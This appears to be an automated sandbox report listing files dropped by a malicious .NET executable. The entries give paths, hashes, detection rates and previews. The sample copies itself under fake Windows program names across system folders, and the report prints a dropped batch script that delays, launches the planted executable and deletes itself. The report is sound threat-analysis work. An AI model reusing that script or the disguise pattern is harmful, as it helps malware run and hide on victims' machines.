                Entropy (8bit):5.3452898570760095
                Encrypted:false
                SSDEEP:3:BnSFiJ711LebxOkcjxpbJCV:0FqR1LeN+jxpe
                MD5:83521C1F32D58A77972AAFF0F25E8E72
                SHA1:44CC9D88CF42410026FCDECCAFBF51E9FD8FE808
                SHA-256:F3DCA97E25C51BF85D58AD4F96FD787A17AFBB24CCFA544CD5176D66CFF83035
                SHA-512:A030F4E86FDD7601E27312BD0453A52267C26B7F91CB55EDBFFD945262A2922A81579DECB81570BAD04BCE32323109B2E566E9C2E31A2369D88A2077C839A330
                Malicious:false
                Preview:2J33UYxB7zHGl4SKljC7ftEc8JbnA2dL4HwA1nEm940eN9VMURmxJdiIFb4L6JBEW5MeIRT8eZ8

                C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exe

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files\MSBuild\db8cdfc8abc352

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):80
                Entropy (8bit):5.340311532225103
                Encrypted:false
                SSDEEP:3:ZyhcSxY/tcM9XWnO0mFK6HtSXlq:8cn/tvdWnO9PHt+q
                MD5:C283D9F52748D33F68CBEF4A74044988
                SHA1:6999AB86A32B0045891FAE293690923FB2809FE1
                SHA-256:97AE105F5AC067BECC5B5CB1F67D5A766AA13A5C160DF27EFC6AEF8DB7985D65
                SHA-512:6672745F5749EA8507E8DEED212C16BA6832584C0437CA203D3BAC774B243F45CB027974011B55C8D570DF7FC4B7057C39FCFA8DD556073C36CDB7A373A32A98
                Malicious:false
                Preview:K3uBDCmcxGi8pz7TKKuPxHEyhZ2X9ToQajJTHxMDQ62cRJUNq1dHXJQCz6doKPddbSiGqoLW7r91OmhY

                C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files\Windows Mail\db8cdfc8abc352

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with very long lines (428), with no line terminators
                Category:dropped
                Size (bytes):428
                Entropy (8bit):5.877941919115159
                Encrypted:false
                SSDEEP:6:6sck8HHGj/JQnfl4RA29lHphSFyYfjIcRLKcXhYmsv2izk9DcVe1mAOVzufmY5fo:LckbnRtpD8j/nhYmi5z8UrZdX
                MD5:8A2C7151ABE6BE91FECA6B2DBEF5BCD8
                SHA1:80DF2B644621623256FFBA42D6DACB85D4BBFC8B
                SHA-256:A052A8952AC5758FA1DB320A6520E770A572BBDF90BCF2C92096F9929C668BA7
                SHA-512:3BF4AF9B8935B38CBF2F3B9A3FABAADA7600FEB1556BCECC0A7EDB8BA580EC3C281C14F532139853C6F542EBD4DCC2FAB1246A0C7AA2B2730BDA01C06DAF26EB
                Malicious:false
                Preview:ezFLxNmM48GGwHyE3vbeGFhIVoStyT8JXcPZ2Oa3wHJRd2B5f2XxJ3TYS70J52Yl96sU1ZMoVhs96QpcnXO65LAeI1H4YR83thRgJrDFptclKTcBSXghobqy6NLASSPDjzQY9IT6TIRMsYUyYFmBvaOR1dj5fDxXdYCUDDCJEkOgKeFi3WlMpOSJl8hgjXaQV3sUW9vVDc6LLsHWXBCIbkrOG2tEfgkrJ8KQvvL3lQJNSH721KIiVSyuMeNdQqzg2PBNh0lmzIhLbd6850NUXCW1JaERhsn4amVDFtVAjgsMunTsiPiZdfJz3KEHwUEGfnvyI23MfMv1TJGgGVsSKNa5dfK5pNOObmqH1ekpVW4RtRgtEhAblw6SMzVms8gR7gZrc8oluD6ySJLL9a0HMxnopY5BJ76XznTN2zQG2Zqi

                C:\Program Files\Windows Portable Devices\6ccacd8608530f

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):220
                Entropy (8bit):5.704980326689536
                Encrypted:false
                SSDEEP:6:KaQfi15G/igV/HqEp1WNRUxY1C24EYePwEJA0WCzB:KaxyagVSELLxe4EcEJA0Wc
                MD5:683EB3E9075ACB5AC0567447C8290E84
                SHA1:B7FF66F6AA1962900FBBF76AF89F7343A56BAB05
                SHA-256:A2FE7FDA403418CEDEF1B747988D7B57B9104EDB96C9BD35AB57533AF861367F
                SHA-512:B3B889ED3B6A7FEB20729AFB87E2CF3B7B8D9DE6109D36FFF8783F5BCDBAFFDF6835184AA15C1C649F7FCE2D357EAF6E63FF6DB92E5209692F83E422F1938B8D
                Malicious:false
                Preview:vHthavB0kAxejZuzLYYda9WPmL4z6n0LpmfHSDhkOUwh6y52SJDgZZwvue5P0L47Kmy64mhH1xPFMzSxPChwjTwP0tXxHSuCazWTA97pm5plKrj5LI9yoHX00iGKPtAjDMpWc9wQE1JooKFIKbm9S5YScfdc2xZ35Fi7BMdMVtuw7tMpd79yHARIyW46fTXQbQsimHG88ZojLlUtTx94ylw5yaJp

                C:\Program Files\Windows Portable Devices\Idle.exe

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files\Windows Portable Devices\db8cdfc8abc352

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):70
                Entropy (8bit):5.404213195485488
                Encrypted:false
                SSDEEP:3:RCmNqbm03RY/XkDRluVae9MR2:ImkC03RYfKSZQ2
                MD5:AF403E4819542F5BD33FA084DDE14AD2
                SHA1:D2F1131547E79EFC7AE323C24E7AE392782598A6
                SHA-256:BEED537E0C98BD11C6B462F321D83829C1A7083BF5CAA7692E2BBDD7B40926DF
                SHA-512:C378EDC0265A70AC17BE93A33FA0F8E556C2F4BD06C69FC14B732D5D18B26AFACA7FB222264F04E12990D2BC3EBB03CC027534F83ABEF4697038B59F291AA1C5
                Malicious:false
                Preview:hLpZQvCETK81VgW59C2ARimzIBscH74xdxwDZr92vWutmX495qM262w9j0ROCk7VPLXitS

                C:\Program Files\Windows Portable Devices\ea1d8f6d871115

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with very long lines (327), with no line terminators
                Category:dropped
                Size (bytes):327
                Entropy (8bit):5.833046311575464
                Encrypted:false
                SSDEEP:6:o8ilvt3qvIgvVZ+bYjll/Hau+u7g9yWUEeY+38NDrmuOoz9FlLQEC1:niJtavBkGly8RWUEfDnO2LQJ
                MD5:C105CD501B5D1E3556F087D12C403A0F
                SHA1:564A3DEFBA8A654482763E9DF8101A0412D66F09
                SHA-256:2CFA1EA1FE8CA024E057652E7186D9B4FC06A03B87C532C27D7C71F783A730C2
                SHA-512:BC7906C7E897C088793CEBB10DF547AB97EA1D1FA893ECBB3233EB1226048BF17B8A461CD601EB3689FAE75E1F41A1E94B12E4EC8C9584E933043BA15267BC4C
                Malicious:false
                Preview:haJrUwCNzYSZdb3trIScxuVOv5RrNvHvZg4vloYsbJEMcN3Te7mcfAgwE46ZfU9DRg97gIIDtkBoqIvhB8NQJoPZ9Iqqs8MGJA55N6xWzis582G6JYYhHt4mRk7YbbVvX5eqM0UEK0bk6UaHBuhUjp8aFTon8Y4XN7iDXatSDTWQSUq7KzWq4BLr6Ek3MrGv5DW8vWulBOQQTsHunqdJCOcMw0HTz0GWNkUO8rLxFuppu4YO6zPfN6trkJL5OavKI3CtX2w5fpDSixb1c3XAkkIQ1nnyfQip8eh12o1DDTAi3aJxsUcVCvkiuv2tP8aOGYTDPk9

                C:\Program Files\Windows Portable Devices\upfc.exe

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\3D Objects\db8cdfc8abc352

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with very long lines (435), with no line terminators
                Category:dropped
                Size (bytes):435
                Entropy (8bit):5.84816705924136
                Encrypted:false
                SSDEEP:12:7YS6h0JRH5vZcM8Whg3L+avuVBkXSSGIqoSxhnn:KubtiMl4L+53kXKIqoSxhn
                MD5:1FC6EDF94E7B7E8B9EC3ECEABFF6C643
                SHA1:40E24A1D7E6CD1B5C05CE135B609081634ED232E
                SHA-256:5261EBE8BD4EDD4C4CC947567AD0CBA051F0F4DF4F37BC79D49F75896D3B2753
                SHA-512:83A1BB9F2561AD89E6CB7C12FB05D6AF23AAD745B6A475B886386097BCA7C3441CE0F56A0D6DA29972D06C98D4D1B7956D9E8142824A7AB51BBA630EDFAFA323
                Malicious:false
                Preview:jo5as3qz3vHSx1ED8oSuf7PfM4Xr0Syr2v4eV2PlsIrHc6M6KQulXS4lZZOxg99l6aZB7jrGYrBXPHDPsbgkiNTk0SF6nbFtJGKCgK9lioMpQhWRW8FEdZCtGzLoevc7mSOJ6Athc5B3AoTT6xjoWAQuDb5r9UGxMPD8TMVVPhmhXJtcf2rqLxkmCeFfFCiHyNrukVAtcNZzXsW4rdLHmZlYob5yHzQN8ftJb81K28O8YvOUHLxl1beYmSFJZLmm7L029McsmAPoLnA3Mlr5BpWhAUhI2ruqVlBM4WU4sF80MzN8RM7ydqkRyT1ppUz5PiSjmy8zQwN6qgUKGi0qt6NpBtXlfpPYPDlohnWdOHhrdolS8qiGdJLSVni2aWUkgyrm4qncLXblZfLXHFnzHI5F2ST3FeD1x6Lo68XSCF5Frj3zcLu

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Idle.exe.log

                Download File
                Process:C:\Program Files\Windows Portable Devices\Idle.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OjTEkrTlLyhdt.exe.log

                Download File
                Process:C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\intoDhcp.exe.log

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1915
                Entropy (8bit):5.363869398054153
                Encrypted:false
                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1Jtpaq2
                MD5:E6E3A2B5063C33228E2749DC291A1D3D
                SHA1:F3F32E2F204DE9AFA50D5DE1C132A8039C5A315C
                SHA-256:2F6BA7ECDDEF02B291DEA6E03ADD8A30A67B8DE1B7E256FA99B14A28AB9BE831
                SHA-512:15EF30345C2F08AD858A9E5C10CD309F00D1951E4A4902CE8F8700A2B0A25FCFADCFCDA6D13EC7B215B0AF1AB24C8956033E93A403178ED7A98138476D4F9967
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                C:\Users\user\AppData\Local\Temp\GoElC7XtGN.bat

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:DOS batch file, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):215
                Entropy (8bit):5.074671579826758
                Encrypted:false
                SSDEEP:6:hITg3Nou11r+DEimKQkSXLsKOZG1wkn23fVHK:OTg9YDEi9TfY
                MD5:E53D7B277DD85C6063B0C2E240C4BC56
                SHA1:95BD65FF4BB0479A9D66F68C7C785EEB1AA66538
                SHA-256:7C99E911C9224EFFAAEFC2B5A58DE638980C92F9BEA13C1923CC4C5CC039FB5F
                SHA-512:518C41C0DEF13B0E86C99E3F6142B20E1FE441859E0A7C15A5EB2D8FD525703ED8B3F674073D52C32FE654C81B08311434104EE0B81BB5F665B4B43524E4DD89
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Program Files\Windows Portable Devices\upfc.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\GoElC7XtGN.bat"

                C:\Users\user\AppData\Local\Temp\ILJWfEtwdo

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):25
                Entropy (8bit):4.323856189774723
                Encrypted:false
                SSDEEP:3:D9sgyFF/jbUXn:hsgyvsX
                MD5:D276564574B4133CDBA1CE0AC2003CBD
                SHA1:B3087FC8099CB7F1E622CEE3762F654F741CB462
                SHA-256:4DAA1D46855D3F4216F914D504B7E8A727D7A6F89466281C6F8662096C86B2B0
                SHA-512:F4839AEB0D6A29E720019987DECC78111C08379AAB51323D5F692E29ABE060C7C7ED47D360679B8D9735211A62E88E84476D6172AAA2B4F866EC47188E578771
                Malicious:false
                Preview:EcXtx0F3hWWXBwysOZ7uKqqQK

                C:\Users\user\OjTEkrTlLyhdt.exe

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\db8cdfc8abc352

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):64
                Entropy (8bit):5.09727441389348
                Encrypted:false
                SSDEEP:3:G6XT68bVrX0lLktISQQQT:G8D5rXCgXQQG
                MD5:2D99F012A1F8AF7A01580BEFB490ADE4
                SHA1:C3795496B93BE5E82FF874E6C363F9217A39A87A
                SHA-256:62DB5C28968163AE12928942DAD195145208DB959DB72C981F2F743D54558865
                SHA-512:208C80DF893B0B03987C49DCC9FADD0D2CA2304DB20E4AB7BD05B6480282DE12BD32BDECD78DB9D270528A0F334B8FF6C8F2CFBD5EFD197F567910681E94B0C2
                Malicious:false
                Preview:W0BzrWr6NCLnrUdczextM7bqbrmNrQntounDwwEiGd5mG3Ar2BeNM41YYVXAueP6

                C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe

                Download File
                Process:C:\Users\user\Desktop\rWjaZEKha8.exe
                File Type:data
                Category:dropped
                Size (bytes):225
                Entropy (8bit):5.864818538536192
                Encrypted:false
                SSDEEP:6:GV0wqK+NkLzWbH9WF08nZNDd3RL1wQJRcUbkqRvm56UnEgX:GVFMCzWL74d3XBJ2KkqM6UJX
                MD5:766D272299241FC13968CB8B7C426A33
                SHA1:D74D13748E4AD4525438156682C97EE88038D377
                SHA-256:72EEFED0912DCF4952A9F4FD92172D21872EAA148D5C9D08A0BFBB7918038BDF
                SHA-512:DFADCBB1E2E9FDDE6A6E2E1542ECE82212D34AE9F2EAC7DFE5C674C030231F26EE10AC93E8B271B11D7031A40FD79425B21C14B2494EA930A7DFDBB5C88671AB
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
